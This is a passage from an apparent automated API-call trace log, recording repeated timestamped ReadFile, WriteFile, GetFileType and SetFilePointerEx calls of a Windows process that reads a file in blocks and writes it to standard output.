lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.473] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.473] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] GetFileType (hFile=0x50) returned 0x1 [0209.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.474] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.475] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.475] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.475] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.476] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.476] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] GetFileType (hFile=0x50) returned 0x1 [0209.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.476] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] GetFileType (hFile=0x50) returned 0x1 [0209.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.477] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.478] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.478] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.478] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] GetFileType (hFile=0x50) returned 0x1 [0209.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.479] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.479] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.479] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.480] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.480] GetFileType (hFile=0x50) returned 0x1 [0209.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.481] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.481] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] GetFileType (hFile=0x50) returned 0x1 [0209.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.481] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] GetFileType (hFile=0x50) returned 0x1 [0209.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.482] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.482] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.482] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.482] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, 